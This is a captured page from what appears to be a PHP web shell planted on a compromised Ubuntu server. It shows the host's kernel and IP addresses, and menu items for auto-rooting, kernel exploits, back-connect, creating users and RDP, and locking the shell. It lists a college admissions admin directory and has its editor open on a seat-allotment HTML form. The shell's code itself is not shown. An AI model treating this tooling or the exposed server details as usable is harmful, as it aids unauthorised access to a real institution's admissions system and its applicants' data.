Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.170.80
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
pgadm2020 /
bcupg-admin /
[ HOME SHELL ]
Name
Size
Permission
Action
MainPage.html
11.01
KB
-rw-rw-r--
admconfirmation.html
8.43
KB
-rw-rw-r--
appdetails.html
0
B
-rw-rw-r--
applicationview.html
5.37
KB
-rw-rw-r--
applicationview_bkp.html
69.28
KB
-rw-rw-r--
change-password.html
3.91
KB
-rw-rw-r--
collegedetails.html
777
B
-rw-rw-r--
create-user.html
5.02
KB
-rw-rw-r--
degreedetails.html
772
B
-rw-rw-r--
documentverification.html
27.51
KB
-rw-rw-r--
editapp.html
3.85
KB
-rw-rw-r--
home.html
756
B
-rw-rw-r--
index.html
6.84
KB
-rw-rw-r--
intake.html
1.85
KB
-rw-rw-r--
merit_list.html
1.24
KB
-rw-rw-r--
reports.html
4.72
KB
-rw-rw-r--
rostertable.html
2.03
KB
-rw-rw-r--
seatallotment.html
2.43
KB
-rw-rw-r--
seatmatrix.html
2.08
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : seatallotment.html
<script> //$("select").selectpicker(); </script> <!-- Latest compiled and minified CSS --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-select@1.13.14/dist/css/bootstrap-select.min.css" /> <!-- Latest compiled and minified JavaScript --> <script src="https://cdn.jsdelivr.net/npm/bootstrap-select@1.13.14/dist/js/bootstrap-select.min.js"></script> <div class="row clearfix"> <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12"> <div class="card" id="add"> <input type="hidden" id="screen" value="add" /> <div class="header"> <h2> <b>Seat Allotment</b> </h2> </div> <div class="body" style="padding: 20px;"> <form class="form-horizontal" id="add"> <div class="row clearfix"> <div class="col-lg-3 col-md-2 col-sm-4 col-xs-5 form-control-label" style="margin-top: 10px;" > <label class="pull-left" for="daterange" ><b style="font-size: 17px;">Round</b></label > </div> <div class="col-sm-3 col-md-3"> <div class="form-group"> <select id="freports" class="form-control" name="fcategory"> <option value="">--Select--</option ><option value="mock">Mock Allotment</option ><option value="roundone">Round 1</option ><option value="roundtwo">Round 2</option></select > </div> </div> </div> <div class="row clearfix"> <div class="col-lg-offset-2 col-md-offset-3 col-sm-offset-4 col-xs-offset-5" > <button type="button" class="btn btn-primary waves-effect m-l-40" onclick="openSeatAllotment()" > Allot Seats </button> </div> </div> </form> </div> </div> <div class="card" id="next" hidden> <input type="hidden" id="screen" value="next" /> <div class="header"> <h2> <b>Student Report</b> </h2> </div> <div class="body" style="padding: 20px;"> <div class="row clearfix" id="appdet" style="margin: auto; padding: 20px;" > <table class="table table-bordered"></table> </div> </div> </div> </div> </div>
Close